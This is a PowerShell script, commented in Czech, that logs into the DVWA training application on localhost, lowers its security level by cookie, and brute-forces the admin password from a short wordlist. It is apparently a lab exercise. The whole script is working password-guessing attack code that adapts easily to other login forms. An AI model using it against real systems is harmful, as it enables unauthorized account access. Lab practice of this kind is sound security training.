# =================================================================
# NASTAVENÍ
# =================================================================
$baseUrl = "http://localhost/dvwa"
$loginUrl = "$baseUrl/login.php"
$targetUrl = "$baseUrl/vulnerabilities/brute/"

# Přihlašovací údaje do samotné DVWA (ne ty, které hádáme)
$dvwaUser = "admin"
$dvwaPass = "password"

# Uživatel, kterého budeme "lámata" a slovník hesel
$targetUsername = "admin"
$wordlist = @("123456", "password123", "admin", "root", "password", "tajne")

# =================================================================
# FÁZE 1: PŘIHLÁŠENÍ A ZÍSKÁNÍ RELACE
# =================================================================
Write-Host "1. Navazuji spojení a přihlašuji se do DVWA..." -ForegroundColor Cyan

# První požadavek pro získání session cookie a user_tokenu (CSRF ochrana login formuláře)
# Používáme -SessionVariable pro uchování cookies (PHPSESSID)
$initRequest = Invoke-WebRequest -Uri $loginUrl -SessionVariable "mojeSession" -UseBasicParsing

# DVWA má na login stránce často anti-CSRF token (user_token), musíme ho vyparsovat
$token = $null
if ($initRequest.Content -match "name='user_token' value='([a-f0-9]+)'") {
    $token = $matches[1]
    Write-Host "   Nalezen user_token: $token" -ForegroundColor Gray
}

# Sestavení těla POST požadavku pro přihlášení
$loginBody = @{
    username = $dvwaUser
    password = $dvwaPass
    Login    = "Login"
}
if ($token) { $loginBody.Add("user_token", $token) }

# Odeslání přihlašovacích údajů
try {
    $loginResponse = Invoke-WebRequest -Uri $loginUrl -WebSession $mojeSession -Method Post -Body $loginBody -UseBasicParsing
    Write-Host "   Přihlášení odesláno." -ForegroundColor Green
}
catch {
    Write-Error "Chyba při přihlašování: $_"
    exit
}

# =================================================================
# FÁZE 2: NASTAVENÍ SECURITY LEVEL
# =================================================================
Write-Host "2. Nastavuji úroveň zabezpečení na 'low'..." -ForegroundColor Cyan

# Vytvoření cookie objektu pro security=low
$cookie = New-Object Microsoft.PowerShell.Commands.WebRequestCookie
$cookie.Name = "security"
$cookie.Value = "low"
$cookie.Domain = "localhost" # Upravte, pokud běžíte na jiné IP/doméně

# Přidání cookie do naší existující session
$mojeSession.Cookies.Add($cookie)

Write-Host "   Security cookie nastavena." -ForegroundColor Green

# =================================================================
# FÁZE 3: BRUTE FORCE ÚTOK
# =================================================================
Write-Host "3. Zahajuji útok hrubou silou na: $targetUrl" -ForegroundColor Magenta
Write-Host "------------------------------------------------"

foreach ($password in $wordlist) {
    # DVWA Brute Force (Low level) používá GET parametry v URL
    # Formát: ?username=admin&password=heslo&Login=Login
    $attackUri = "$targetUrl?username=$targetUsername&password=$password&Login=Login"

    try {
        # Odeslání požadavku s naší session (obsahuje PHPSESSID i security=low)
        $response = Invoke-WebRequest -Uri $attackUri -WebSession $mojeSession -Method Get -UseBasicParsing
        
        # Analýza odpovědi.
        # Pokud přihlášení selže, stránka obsahuje text "Username and/or password incorrect."
        # Pokud se povede, tento text tam NENÍ (nebo je tam "Welcome").
        
        if ($response.Content -match "Username and/or password incorrect") {
            Write-Host "[-] Neúspěch: $password" -ForegroundColor Gray
        }
        else {
            Write-Host "[+] HESLO NALEZENO: $password" -ForegroundColor Green -BackgroundColor Black
            Write-Host "   (Délka odpovědi: $($response.Content.Length) znaků)"
            
            # Můžeme skončit po nalezení
            break
        }
    }
    catch {
        Write-Host "[!] Chyba při požadavku: $_" -ForegroundColor Red
    }
    
    # Krátká pauza, abychom nezahltili server (slušnost i při testování)
    Start-Sleep -Milliseconds 100
}

Write-Host "------------------------------------------------"
Write-Host "Dokončeno."